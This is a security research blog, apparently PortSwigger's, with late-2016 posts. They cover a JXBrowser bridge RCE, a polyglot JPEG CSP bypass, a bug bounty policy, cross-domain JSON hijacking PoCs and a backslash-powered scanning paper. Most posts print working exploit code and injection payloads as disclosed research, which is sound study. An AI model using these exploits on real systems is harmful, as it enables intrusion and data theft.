Thursday, December 8, 2016

RCE in JXBrowser JavaScript/Java bridge

I recently found myself prototyping an experimental scanning technique using JXBrowser, a library for using a PhantomJS-like browser in Java applications. Whilst creating a JavaScript to Java bridge using the JXBrowser library, I wondered if it was possible to achieve remote code execution from a web page attacking the JXBrowser client by calling different classes than the one I supplied. My JavaScript to Java bridge looked something like this:

browser.addScriptContextListener(new ScriptContextAdapter() {
    public void onScriptContextCreated(ScriptContextEvent event) {
        Browser browser = event.getBrowser();
        JSValue window = browser.executeJavaScriptAndReturnValue("window");
        window.asObject().setProperty("someObj", new someJavaClass());

This example was taken from the JXBrowser web site, basically the code injects a script into the browser instance, retrieves the window object and converts it into a Java JSValue object, then it sets “someObj” on the window and passes the Java object to the JavaScript window object and we have a bridge! The docs said that only public classes could be used. Once we have created a bridge we need some JavaScript to interact with it.

setTimeout(function f(){
    if(window.someObj && typeof window.someObj.javaFunction === 'function') {
      window.someObj.javaFunction("Called Java function from JavaScript");
    } else {

We have a setTimeout that checks to see if we have “someObj”, if not it calls itself until we do. My first attempt was to use getRuntime() to see if I could get an instance of the runtime object and execute calc. I called:


I got the following error back:
Neither public field nor method named 'getRuntime' exists in the java.lang.Class Java object.

Maybe it wasn’t possible to call getRuntime? I tried to do something simpler:


This seemed to work. I tried enumerating the methods too.

methods = window.someObj.getClass().getSuperclass().getMethods();
for(i=0;i<methods.length();i++) {

So I could successfully enumerate the methods. I decided to try ProcessBuilder next and see what would happen. But every time I tried to call the constructor it failed. It seems the constructor was expecting a Java Array. Somehow I needed to create a Java array of strings so I could pass it to the ProcessBuilder constructor.

window.someObj.getClass().forName("java.lang.ProcessBuilder").newInstance("open","-a Calculator");

window.someObj.getClass().forName("java.lang.ProcessBuilder").newInstance(["open","-a Calculator"]);
//Failed too 

Leaving this problem for a second I tried to create another object that would prove this is vulnerable. I could successfully create an instance of the class.


I tried calling “connect” on this object but again I had the problem of incorrect types for the arguments. This did prove however that I could create socket objects, I couldn’t use them but I could at least create them. It’s worth noting here that I wasn’t passing any arguments for this to work. Next I tried the class but again it failed, I had no option but to use reflection but any time a function was expecting arguments I couldn’t supply it with the correct type. newInstance didn’t work and invoke didn’t work.

I needed help, I needed Java expert help. Fortunately working at Portswigger you are never the smartest one in the room :) I asked Mike and Patrick for their help. I explained the problem that I needed a Java array in order to pass arguments to a function and so we began looking for ways to create arrays in our bridge.

Mike thought maybe using an arraylist was the answer because we could convert it to an array with it’s convenient toArray method.

list = window.someObj.getClass().forName("java.util.ArrayList").newInstance(); 
a = list.toArray();

The call threw a no such method exception and stated that our argument passed was in fact a JSObject. So even though we created an ArrayList the toArray was being converted to a js object by the bridge so the incorrect argument type was being sent to process builder.

We then tried to create an Array instead. Using reflection again we called new instance on the java.lang.reflect.Array but it complained that again we had incorrect argument types, we were sending a double but it was expecting an int. Then we tried to create an int using java.lang.Integer. But again we had the damn argument type problem. Patrick thought we could use the MAX_INT property and create a huge array :) but at least we’d have our int but no, the bridge of course was converting the integer from java into a double.

This is what we tried:

But we got a null pointer exception and without arguments didn’t work either but this is JavaScript remember I thought why not send 123 and see if it will be accepted as an argument and we thought it wouldn’t work but it did in fact print out our max int. We continued trying to call the Array constructor with our max int value but it of course failed. Then we decided to look at the runtime object and see if we could use the same technique. Mike suggested using getDeclaredField and get the current runtime property and making it accessible because it was a private property and to our great delight we popped the calculator.

field = window.someObj.getClass().forName('java.lang.Runtime').getDeclaredField("currentRuntime");
runtime = field.get(123);
runtime.exec("open -a Calculator");

This meant any website rendered in JXBrowser by code employing the JavaScript-Java bridge could potentially take complete control of the client.

We privately reported this issue to TeamDev (the makers of JXBrowser), and they released a patch to support a whitelist of allowed properties/methods using the @JSAccessible annotation. Note that if an application doesn't use the @JSAccessible annotation anywhere the whitelist won't be enforced, and the exploit above will still work.

Enjoy - @garethheyes

Thursday, December 1, 2016

Bypassing CSP using polyglot JPEGs

James challenged me to see if it was possible to create a polyglot JavaScript/JPEG. Doing so would allow me to bypass CSP on almost any website that hosts user-uploaded images on the same domain. I gleefully took up the challenge and begun dissecting the format. The first four bytes are a valid non-ASCII JavaScript variable 0xFF 0xD8 0xFF 0xE0. Then the next two bytes specify the length of the JPEG header. If we make that length of the header 0x2F2A using the bytes 0x2F 0x2A as you might guess we have a non-ASCII variable followed by a multi-line JavaScript comment. We then have to pad out the JPEG header to the length of 0x2F2A with nulls. Here's what it looks like:

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....

Inside a JPEG comment we can close the JavaScript comment and create an assignment for our non-ASCII JavaScript variable followed by our payload, then create another multi-line comment at the end of the JPEG comment.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

0xFF 0xFE is the comment header 0x00 0x1C specifies the length of the comment then the rest is our JavaScript payload which is of course */=alert("Burp rocks.")/*

Next we need to close the JavaScript comment, I edited the last four bytes of the image data before the end of image marker. Here's what the end of the file looks like:

2A 2F 2F 2F FF D9

0xFF 0xD9 is the end of image marker. Great so there is our polyglot JPEG, well not quite yet. It works great if you don't specify a charset but on Firefox when using a UTF-8 character set for the document it corrupts our polyglot when included as an script! On MDN it doesn't state that the script supports the charset attribute but it does. So to get the script to work you need to specify the ISO-8859-1 charset on the script tag and it executes fine.

It's worth noting that the polyglot JPEG works on Safari, Firefox, Edge and IE11. Chrome sensibly does not execute the image as JavaScript.

Here is the polyglot JPEG:
Polyglot JPEG
The code to execute the image as JavaScript is as follows:
<script charset="ISO-8859-1" src=""></script>

File size restrictions 

I attempted to upload this graphic as a phpBB profile picture but it has restrictions in place. There is a 6k file size limit and maximum dimensions of 90x90. I reduced the size of the logo by cropping and thought about how I could reduce the JPEG data. In the JPEG header I use /* which in hex is 0x2F and 0x2A, combined 0x2F2A which results in a length of 12074 which is a lot of padding and will result in a graphic far too big to fit as a profile picture. Looking at the ASCII table I tried to find a combination of characters that would be valid JavaScript and reduce the amount of padding required in the JPEG header whilst still being recognised as a valid JPEG file.

The smallest starting byte I could find was 0x9 (a tab character) followed by 0x3A (a colon) which results in a combined hex value of 0x093A (2362) that shaves a lot of bytes from our file and creates a valid non-ASCII JavaScript label statement, followed by a variable using the JFIF identifier. Then I place a forward slash 0x2F instead of the NULL character at the end of the JFIF identifier and an asterisk as the version number. Here's what the hex looks like:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A
Now we continue the rest of the JPEG header then pad with NULLs and inject our JavaScript payload:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A 01 01 00 48 00 48 00 00 00 00 00 00 00 ... (padding more nulls) 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

Here is the smaller graphic:
Polyglot JPEG smaller


If you allow users to upload JPEGs, these uploads are on the same domain as your app, and your CSP allows script from "self", you can bypass the CSP using a polyglot JPEG by injecting a script and pointing it to that image.


In conclusion if you allow JPEG uploads on your site or indeed any type of file, it's worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there and remove all JPEG comments. Obviously it's also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn't be possible without the excellent work of Ange Albertini. I used his JPEG format graphic extensively to create the polygot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.



Mozilla are fixing this in Firefox 51

Enjoy - @garethheyes

Wednesday, November 30, 2016

PortSwigger bug bounty program

Today we are pleased to announce our bug bounty program. This covers:
The program is managed on HackerOne, and all reports should be submitted through that platform.

Full details of the program policy are reproduced below. Please read the policy carefully and in full before carrying out any testing or submitting any reports.


Subdomains of like are strictly out of scope. Do not test these.

If you wish to test the Burp Collaborator functionality, please configure your own private Collaborator server and test that.

Vulnerabilities of interest

Here are some examples of vulnerabilities that we could consider to be valid, and rough guidelines as to what kind of payout you can expect:

Critical - $5000

  • SQL injection on
  • Remotely retrieving other users' Burp Collaborator interactions

High - $3000

  • Stored XSS on
  • File path traversal on
  • Complete authentication bypass on
  • A website accessed through Burp Suite can make Burp execute arbitrary code

Medium - $1000

  • A website accessed through Burp Suite can retrieve local files from the user's system
  • A website accessed through Burp Suite can extract data from Burp's sitemap
  • Exploitable reflected XSS on
  • CSRF on significant actions

Any medium severity issue involving unlikely user interaction - $350

  • Reflected XSS that is unexploitable due to CSP
  • A website scanned using Burp Suite can inject JavaScript into reports exported from the scanner as HTML
  • DLL hijacking on the Burp Suite installer, on fully patched Windows 7/8.1/10

Issues not of interest

The following are strictly forbidden and may result in you being barred from the program, the website, or both:
  • Denial of service attacks
  • Physical or social engineering attempts
  • Targeting subdomains of
  • Bruteforcing subdomains
  • Spamming orders
  • Unthrottled automated scanning - please throttle all tools to one request per second.

  • We are not interested in low severity, purely theoretical and best-practice issues. Here are some examples:
    • Denial of service vulnerabilities
    • Headers like Server/X-Powered-By disclosing version information
    • XSS issues in non-current browsers
    • window.opener related issues
    • Unvalidated reports from automated vulnerability scanners
    • CSRF with minimal security implications (logout, etc.)
    • Issues related to email spoofing (eg SPF/DMARC)
    • DNS issues
    • Content spoofing
    • Reports that state that software is out of date or vulnerable without a proof of concept
    • Missing autocomplete attributes
    • Missing cookie flags on non-security sensitive cookies
    • SSL/TLS scan reports (this means output from sites such as SSL Labs)
    • Caching issues
    • Concurrent sessions
    • HPKP / HSTS preloading
    • Implausible bruteforce attacks
    There are a few known issues we consider to be low severity, but may fix eventually:
    • As customer numbers are emailed out in plaintext, users should be encouraged to regenerate them on first login.
    • Generating a new customer number should kill all associated sessions.
    • Invoices, quotations, and receipts can be accessed by anyone who is given the link. This is an intentional design decision to enable sharing (the ability to view someone's invoice without being given the link would be considered a serious vulnerability).
    Some other caveats:
    • The Paypal price can be tampered with but underpayment will result in product non-delivery so this isn't a security issue.
    • We use Content-Security-Policy (CSP) site-wide. This means you will have a hard time doing alert(1). To maximize your payout, see if you can make a payload that will steal some sensitive information.
    • As the makers of Burp Suite, we can assure you that we have already scanned our website with it. Don't waste your bandwidth.
    • Extensions including those in the BApp Store are out of scope.

    What constitutes a vulnerability in Burp Suite?

    The system that Burp Suite runs on is trusted, and every system that can access the Proxy listener is trusted to access the data within Burp. Extensions, configuration files and project files are also trusted. Websites accessed through Burp are untrusted, so anything a website could do to read files off the user's computer, read data out of Burp Suite, or gain remote code execution would be considered a vulnerability. Also, any way to get someone else's Collaborator interactions would be considered a vulnerability. Burp doesn't enforce upstream SSL trust by design, so we're not currently concerned about issues like weak SSL ciphers that would be considered a vulnerability in a web browser. Detection of Burp usage, denial of service vulnerabilities, and license enforcement/obfuscation issues are all out of scope. Please refer to the payout guidelines for some example vulnerabilities.


    If you have any questions, you can contact us at

    Good luck and have fun!

Friday, November 25, 2016

JSON hijacking for the modern web

Benjamin Dumke-von der Ehe found an interesting way to steal data cross domain. Using JS proxies he was able to create a handler that could steal undefined JavaScript variables. This issue seems to be patched well in Firefox however I found a new way to enable the attack on Edge. Although Edge seems to prevent assignments to window.__proto__ they forgot about Object.setPrototypeOf. Using this method we can overwrite the __proto__ property with a proxied __proto__. Like so:

Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
<script src="external-script-with-undefined-variable"></script>
<!-- script contains: stealme -->
Edge PoC stealing undefined variable

If you include a cross domain script with stealme in, you will see it alerts the value even though it's an undefined variable.

After further testing I found you can achieve the same thing overwriting __proto__.__proto__ which is [object EventTargetPrototype] on edge.

__proto__.__proto__=new Proxy(__proto__,{
<script src="external-script-with-undefined-variable"></script>

Edge PoC stealing undefined variable method 2

Great so we can steal data x-domain but what else can we do? All major browsers support the charset attribute on script, I found that the UTF-16BE charset was particularly interesting. UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =).  Can you see where this is going?

Lets say we have a response from the web server that returns an array literal and we can control some of it. We can make the array literal an undefined JavaScript variable with a UTF-16BE charset and steal it using the technique above. The only caveat is that the resulting characters when combined must form a valid JavaScript variable.

For example let's take a look at the following response:

["supersecret","input here"]

To steal supersecret we need to inject a NULL character followed by two a's, for some reason Edge doesn't treat it as UTF-16BE unless it has those injected characters. Maybe it's doing some sort of charset sniffing or maybe it's truncating the response and the characters after NULL are not a valid JS variable on Edge I'm not sure but in my tests it seems to require a NULL and padded out with some characters.  See below for an example:

<!doctype HTML>
Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
        alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->

Edge PoC stealing JSON feeds

So we proxy the __proto__ property as before, include the script with a UTF-16BE charset and the response contains a NULL followed by two a's in the second element of the array literal. I then decode the UTF-16BE encoded string by bit shifting by 8 to obtain the first byte and bitwise AND to obtain the second byte. The result is an alert popup of ["supersecret"," as you can see Edge seems to truncate the response after the NULL. Note this attack is fairly limited because many characters when combined do not produce a valid JavaScript variable. However it may be useful to steal small amounts of data.

Stealing JSON feeds in Chrome

It gets worse. Chrome is far more liberal with scripts that have a exotic charset. You don't need to control any of the response in order for Chrome to use the charset. The only requirement is that as before the characters combined together produce a valid JavaScript variable. In order to exploit this "feature" we need another undefined variable leak. At first glance Chrome appears to have prevented overwriting the __proto__  however they forgot how deep the __proto__ goes...

__proto__.__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{
    has:function f(target,name){
        var str = f.caller.toString();
        alert(str.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","abc"] -->
NOTE: This was fixed in Chrome 54
Chrome PoC stealing JSON feeds works in version 53

We go 5 levels deep down the __proto__ chain and overwrite it with our proxy, then what happens next is interesting, although the name argument doesn't contain our undefined variable the caller of our function does! It returns a function with our variable name! Obviously encoded in UTF-16BE, it looks like this:

function 嬢獵灥牳散牥琢Ⱒ慢挢崊

Waaahat? So our variable is leaking in the caller. You have to call the toString method of the function in order to get access to the data otherwise Chrome throws a generic exception. I tried to exploit this further by checking the constructor of the function to see if it returns a different domain (maybe Chrome extension context). When adblock plus was enabled I saw some extension code using this method but was unable to exploit it since it appeared to be just code injecting into the current document.

In my tests I was also able to include xml or HTML data cross domain even with text/html content type which makes this a pretty serious information disclosure. This vulnerability has now been patched in Chrome.

Stealing JSON feeds in Safari

We can also easily do the same thing in the latest version of Safari. We just need to use one less proto and use "name" from the proxy instead of the caller.

__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{
        has:function f(target,name){
            alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));

Safari PoC stealing JSON feeds

After further testing I found Safari is vulnerable to the same issue as Edge and only requires __proto__.__proto__.

Hacking JSON feeds without JS proxies

I mentioned that the UTF-16BE charset works in every major browser, how can you hack JSON feeds without JS proxies? First you need to control some of the data and the feed has to be constructed in such a way that it produces a valid JavaScript variable. To get the first part of the JSON feed before your injected data is pretty easy, all you do is output a UTF-16BE encoded string which assigns the non-ASCII variable to a specific value and then loop through the window and check if this value exists then the property name will contain all the JSON feed before your injection. The code looks like this:

=1337;for(i in window)if(window[i]===1337)alert(i)

This code is then encoded as a UTF-16BE string so we actually get the code instead of a non-ASCII variable. In effect this means just padding each character with a NULL. To get the characters after the injected string I simply use the increment operator and make the encoded string after a property of window. Then we call setTimeout and loop through the window again but this time checking for NaN which will have a variable name of our encoded string.  See below:

setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i);}))}catch(e){}}});++window.a

I've wrapped it in a try catch because on IE window.external will throw an exception when checked with isNaN. The whole JSON feed will look like this:

{"abc":"abcdsssdfsfds","a":"<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}));setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}))}catch(e){}}});++window.", "UTF-16BE")?>a":"dasfdasdf"}

Hacking JSON feeds without proxies PoC

Bypassing CSP

As you might have noticed a UTF-16BE converted string will also convert new lines to non-ASCII variables, this gives it potential to even bypass CSP! The HTML document will be treated as a JavaScript variable. All we have to do is inject a script with a UTF-16BE charset that injects into itself, has an encoded assignment and payload with a trailing comment. This will bypass a CSP policy that allows scripts to reference same domain (which is the majority of policies).

The HTML document will have to look like this:

<!doctype HTML><html>
echo $_GET['x'];

Notice there is no new line after the doctype, the HTML is constructed in such a way that it is valid JavaScript, the characters after the injection don't matter because we inject a trailing single line JavaScript comment and the new lines are converted too. Note that there is no charset declared in the document, this isn't because the charset matters it's because the quotes and attributes of the meta element will break the JavaScript. The payload looks like this (note the tab is required in order to construct a valid variable)


Note: This has been patched on later versions of PHP, it defaults to the UTF-8 charset for text/html content type therefore prevents attack. However I've simply added a blank charset to the JSON response so it still works on the lab.

CSP bypass using UTF-16BE PoC

Other charsets

I fuzzed every browser and charset. Edge was pretty useless to fuzz because as mentioned previously does some sort of charset sniffing and if you don't have certain characters in the document it won't use the charset. Chrome was very accommodating especially because the dev tools let you filter the results of console by a regex. I found that the ucs-2 charset allowed you to import XML data as a JS variable but it is even more brittle than the UTF-16BE. Still I managed to get the following XML to import correctly on Chrome.

<root><firstname>Gareth</firstname><surname>a<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i);setTimeout(function(){for(i in window)if(isNaN(window[i]) && typeof window[i]===/number/.source)alert(i);});++window..", "iso-10646-ucs-2")?></surname></root>

The above no longer works in Chrome but I've included it as another example.

UTF-16 and UTF-16LE looked useful too since the output of the script looked like a JavaScript variable but they caused invalid syntax errors when including a doctype, xml or a JSON string. Safari had a few interesting results too but in my tests I couldn't get it produce valid JavaScript. It might be worth exploring further but it will be difficult to fuzz since you'd need to encode the characters in the charset you are testing in order to produce a valid test. I'm sure the browser vendors will be able to do that more effectively.


You might think this technique could be applied to CSS and in theory it should, since any HTML will be converted into non-ASCII invalid CSS selector but in reality browsers seem to look at the document to see if there's a doctype header before parsing the CSS with the selected charset and ignore the stylesheet, making a self injected stylesheet fail. Edge, Firefox and IE in standards mode also seem to check the mime type, Chrome says the stylesheet was interpreted but at least in my tests it didn't seem that way.


The charset attacks can be prevented by declaring your charset such as UTF-8 in an HTTP content type header. PHP 5.6 also prevent these attacks by declaring a UTF-8 charset if none is set in the content-type header.


Edge, Safari and Chrome contain bugs that will allow you to read cross domain undeclared variables. You can use different charsets to bypass CSP and steal script data. Even without proxies you can steal data if you can control some of the JSON response.


I presented this topic at OWASP London and Manchester. You can find the talk and slides below:

OWASP London talk
Slides from OWASP London talk

Update 2...

After discussing stealing multiple undefined variables with @1lastBr3ath he gave me a link to Takeshi Terada's paper which has a code sample that works in earlier versions of Firefox which have been patched. In the code sample it was shown it's possible to steal multiple undefined variables using a get trap. The get trap makes all undefined variables defined with a value and therefore allows you to steal the data. Google and Apple have patched this issue however it still works on Edge.

The code looks like this:

__proto__.__proto__ = new Proxy(__proto__,{
        return true;
 get: function(){ return 1}//get trap makes all undefined variables defined


Enjoy - @garethheyes

Friday, November 4, 2016

Backslash Powered Scanning: Hunting Unknown Vulnerability Classes


Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.

True to its heritage, this approach also manages to harness some pitfalls that will be all too familiar to experienced manual testers. I'll share some of the more entertaining findings and lessons learned from unleashing this prototype on a few thousand sites, and release a purpose-built stealthy-scanning toolkit. Finally, I'll show how it can be taken far beyond injection hunting, leaving you with numerous leads for future research.

You may prefer to watch the recording.



Outside marketing brochures, web application scanners are widely regarded as only being fit for identifying 'low-hanging fruit' - vulnerabilities that are obvious and easily found by just about anyone. This is often a fair judgement; in comparison with manual testers, automated scanners' reliance on canned technology-specific payloads and innate lack of adaptability means even the most advanced scanners can fail to identify vulnerabilities obvious to a human. In some cases it's unfair - scanners are increasingly good at detecting client-side issues like Cross-Site Scripting, even identifying DOM-based XSS using both static and dynamic analysis. However, black-box scanners lack insight into what's happening server-side, so they typically have a harder time with detection of server-side injection vulnerabilities like SQL injection, Code Injection, and OS Command Injection.

In this paper, I'll break down the three core blind spots in scanners' detection of server-side injection vulnerabilities, then show that by implementing an approach to scanning evolved from classic manual techniques, I was able to develop an open-source scanner capable of detecting research-grade vulnerabilities far above low-hanging fruit. In particular, I will show that this scanner could have found Server-Side Template Injection (SSTI) vulnerabilities prior to the vulnerability class being discovered.

This scanner can be installed as a Burp Suite extension via the BApp store, and the source is available on Github: Backslash Powered Scanner, Distribute Damage.

Three Failures of Scanners

Blind Spot 1: Rare Technology

Security through obscurity works against scanners. As an illustration, I'll look at SSTI, a vulnerability that arises when an application unsafely embeds user input into a template. Depending on the template engine in use, it may be possible to exploit this to gain arbitrary code execution and complete control of the server. In order for a scanner to detect this vulnerability, it needs to be hard coded with a payload for each template engine. If your application is using a popular template engine like FreeMarker or Jinja, that's fine. But how many of the following template engines does your scanner support?

Amber, Apache Velocity, action4JAVA, ASP.NET (Microsoft), ASP.NET (Mono), AutoGen, Beard, Blade, Blitz, Casper, CheetahTemplate, Chip Template Engine, Chunk Templates, CL-EMB, CodeCharge Studio, ColdFusion, Cottle, csharptemplates, CTPP, dbPager, Dermis, Django, DTL::Fast (port of Django templates), Djolt-objc, Dwoo, Dylan Server Pages, ECT, eRuby, FigDice, FreeMarker, Genshi (templating language), Go templates, Google-ctemplate, Grantlee Template System, GvTags, H2o, HAH, Haml, Hamlets, Handlebars, Hyperkit PHP/XML Template Engine, Histone template Engine, HTML-TEMPLATE, HTTL, Jade, JavaServer Pages, jin-template, Jinja, Jinja2, JScore, Kalahari, Kid (templating language), Liquid, Lofn, Lucee, Mako, Mars-Templater, MiniTemplator, mTemplate, Mustache, nTPL, Open Power Template, Obyx, Pebble, Outline, pHAML, PHP, PURE Unobtrusive Rendering Engine, pyratemp, QueryTemplates, RainTPL, Razor, Rythm, Scalate, Scurvy, Simphple, Smarty, StampTE, StringTemplate, SUIT Framework, Template Attribute Language, Twital, Template Blocks, Template Toolkit, Thymeleaf, TinyButStrong, Tonic, Toupl, Twig, Twirl, uBook Template, vlibTemplate, WebMacro, ZeniTPL, BabaJS, Rage, PlannerFw, Fenom
This list only includes the template engines well known enough to be recorded on Wikipedia. Michael Stepankin recently found a remote code execution vulnerability in Paypal stemming from SSTI in Dust.js, a templating engine by LinkedIn conspicuously missing from the above list. Lack of scanner coverage applies equally to anyone using the myriad obscure database languages out there, not to mention frameworks that distort code injection beyond comprehension.

Furthermore, scanners are forced to make assumptions about backend technology stacks, which means changes to one server-side component can break the detection of unrelated vulnerabilities. For example, running a webapp under SELinux can prevent detection of Local File Include and External Entity Include vulnerabilities, since these are typically detected by reading the contents of /etc/passwd, an action SELinux may block.

If this wasn't the case, scanner vendors would be regularly releasing juicy vulnerabilities like SSTI, rather than them going unnoticed for years. Applications with obscure vulnerabilities are absolutely being scanned - during the early stages of my SSTI research when the issue was unpublished, a client of ours informed us that Burp Suite was reporting a false-positive XSS vulnerability on their site. When I investigated the site myself it quickly became apparent the 'false positive' was caused by a significantly more serious SSTI vulnerability.

Ultimately, scanners have seriously degraded performance on applications using the long tail of obscure technologies.

Blind Spot 2: Variants and Filters

Consider a classic vulnerability in a well known language: blind code injection in PHP, inside a double-quoted string. A scanner can easily detect this by sending a payload to induce a time-delay:
So far so good. But if the application happens to filter out parenthesis, we'll get a false negative although the application could still be exploited using
".`sleep 10`."
And if there's a Web Application Firewall (WAF) looking for payloads containing the word 'sleep', we'll almost certainly get a false negative again. Provided the application is normalising input, we can probably still exploit it by using the Cyrillic 'е' character in the hope that it gets normalised into 'e':
And if the application is filtering double-quotes? Once again, we'll get a false negative, when the application is still easily exploitable:
Of these three examples, I've encountered two personally during pentests and seen the third in a writeup by someone else.

The design of scanners makes them easily thwarted by unexpected filters and variations. Scanners could of course send the variant payloads shown above, but those only cover three of numerous possible variations of a single vulnerability. Sending sufficient payloads to cover every variation of every vulnerability is fundamentally implausible at today's network speeds - the Million Payload Problem. Scanners are limited to sending 'best-effort' payloads, which means even something as basic as using double quotes instead of single quotes to encapsulate SQL statements can annihilate a scanner's detection capabilities.

Blind Spot 3: Buried Vulnerabilities

Given the following HTTP request to an endpoint on Ebay that used to be vulnerable to PHP injection, where should a scanner try injecting its payloads?
GET /search/?q=david  HTTP/1.1
User-Agent: Mozilla/5.0 etc Firefox/49.0
Accept: text/html
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: session=pZGFjciI6IjAkLCJlx2V4cCI6MTA4
Connection: close
The obvious place to inject is the 'q' parameter, but that doesn't work. Neither does the Referer, User-Agent, or session cookie. An experienced pentester might think to try injecting in some headers that aren't present, like Origin, X-Forwarded-For, or X-Forwarded Host. In this case, none of these would work either. By the time a scanner reaches this point, it's sent an awful lot of payloads without success. David Vieira-Kurz found it was possible to exploit this endpoint by passing a second q parameter, creating a malicious array server-side:
GET /search/?q=david&q[1]=sec{${phpinfo()}}
He tried this attack because the q parameter causes a search that has a spellchecker, and also filters out certain keywords, which provided a clue that something interesting was happening server-side. Here we once again have a vulnerability that a scanner could detect only if it had no constraints on the number of payloads it could send to each endpoint (or, arguably, detected spellcheckers). This example is an extreme case, but vulnerabilities in other rarely-useful inputs like the Accept-Language header are also likely to be missed.

An Alternative Approach to Scanning

At this point you know how to make an application more or less scanner-proof; just code it with an obscure web language, store data with a niche NoSQL variant with non-standard syntax, and layer a couple of WAFs on top for good measure. How is it that manual testers avoid these blind spots? The fundamental difference is their concept of boring inputs, and interesting, suspicious or promising inputs. David Vieira-Kurz's observation that an input had a spellchecker directly lead to him subjecting it to extensive auditing that would be a waste of time on your typical input.

We can learn from this. Rather than scanning for vulnerabilities, we need to scan for interesting behaviour. Then, having identified the tiny fraction of inputs that yield interesting behaviour, we can investigate further. This iterative approach to identifying vulnerabilities is both extremely flexible in what it can identify, and highly efficient. An input that doesn't yield any interesting results can be quickly discounted, saving time for sustained investigation of inputs that look more promising. The development of a scanner that uses this technique can also be approached in successive stages, as expressed in the following positive feedback cycle:

Suspicious Input Transformations

The initial probe used to identify suspicious behaviour should be as simple and generic as possible. Take the following payload which exploits FreeMarker SSTI:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
We can easily roll this back to a more generic payload that will identify most template engines using a specific popular statement syntax:
${7*7} (expect 49)
Can we expand the coverage of this to detect generic code evaluation? We could try something like:
7*7 (expect 49)
but that will only work on numeric inputs. To detect injection into strings, we need something like:
\x41 (expect A)
However many languages, notably including SQL, don't support hex escapes. This probe can be made one step more generic, to support almost every language:
\\ (expect \)
At this point we have our very first probe for detecting suspicious input transformations. We can now move to the 'Scan' stage of the development process, trying out this payload on a range of applications and seeing what it throws up. Provided the probe is good and the testbed is large enough (more on that later), we'll get a suitably sized set of results which we can manually investigate to find out what's interesting.

In this case, the first step to understanding the behaviour is to look for other input transformations like \x41=>A. By comparing the application's handling of a known-bad escape sequence with other characters, we can gain subtle clues to which characters has special significance server-side. For example, using the baseline of \zz we can easily spot the anomaly:
\zz => \zz

\" => \"
\$ => \$
\{ => {
\x41 => \x41
This tells us that the { character has special significance. Having repeated and refined this manual investigation process a few times, we can loop back around to the 'Implement' stage and automate it. Here's a screenshot of the scanner's output on a page that is vulnerable to Markdown injection:

And a page that isn't vulnerable to anything, but merely calls stripslashes() on the input:

This automated followup means that we can tell how exploitable the endpoint is at a glance. A potential further refinement would be to recognise and classify specific transformation fingerprints.

Note that even though this technique is capable of detecting a huge range of vulnerabilities, on most inputs it only sends a single request. This combination of flexibility and efficiency is at the heart of iterative scanning.

If you're aware of (or able to construct) targets that are definitely vulnerable, you can verify the scanner's susceptibility to false negatives. I found the scanner failed to identify vulnerabilities in JSON responses, since although the server would decode \\ to \, it would then escape the \ back to \\ when embedding it in a JSON string. This was easily fixed by JSON decoding responses where appropriate.

Unfortunately, there's a more serious weakness. This approach relies on user input being reflected after it's been processed. For example, if an application places user input into a SQL SELECT statement, but never displays that query, the vulnerability will be missed entirely. This is a fundamental flaw with relying on suspicious input transformations to detect vulnerabilities.

Probe-Pair Fuzzing

Core Logic

We can avoid relying on input reflection by analysing the entire response and inferring whether our input caused a significant change. At its most basic, this is quite similar to a classic webapp fuzzer (throw input at the application and see if it crashes), and something many pentesters will be familiar with partially automating using Burp Intruder and fuzzlists. We aren't limited to naively looking at status codes and grepping for error messages - using automation, we can recognise changes as subtle as a single word or empty line disappearing.

Just like a manual tester, we can gather further information using pairs of probes. First, we identify the normal response of the application by sending a probe containing random alphanumeric characters. This will be referred to as the 'base' response. If a probe containing ' consistently gets a response that's different from the base, we can infer that the ' character has a special significance to the application. This may not indicate a vulnerability - the application might just be rejecting inputs containing '. Once again, we can use backslashes to escape our predicament. If the application responds to probes containing \' in the same way as random alphanumeric probes, we can infer that the anomalous response to ' is a caused by a failure to escape the character. This might make more sense in a diagram. The smiley and sad faces represent classification as 'interesting' and 'boring' respectively:

This technique isn't limited to identifying injection into strings. We can also identify injections into various other contexts by using alternative probe-pairs. Each additional probe pair only requires a few lines of code, so we're already using quite a few:

' vs \' // single-quoted string
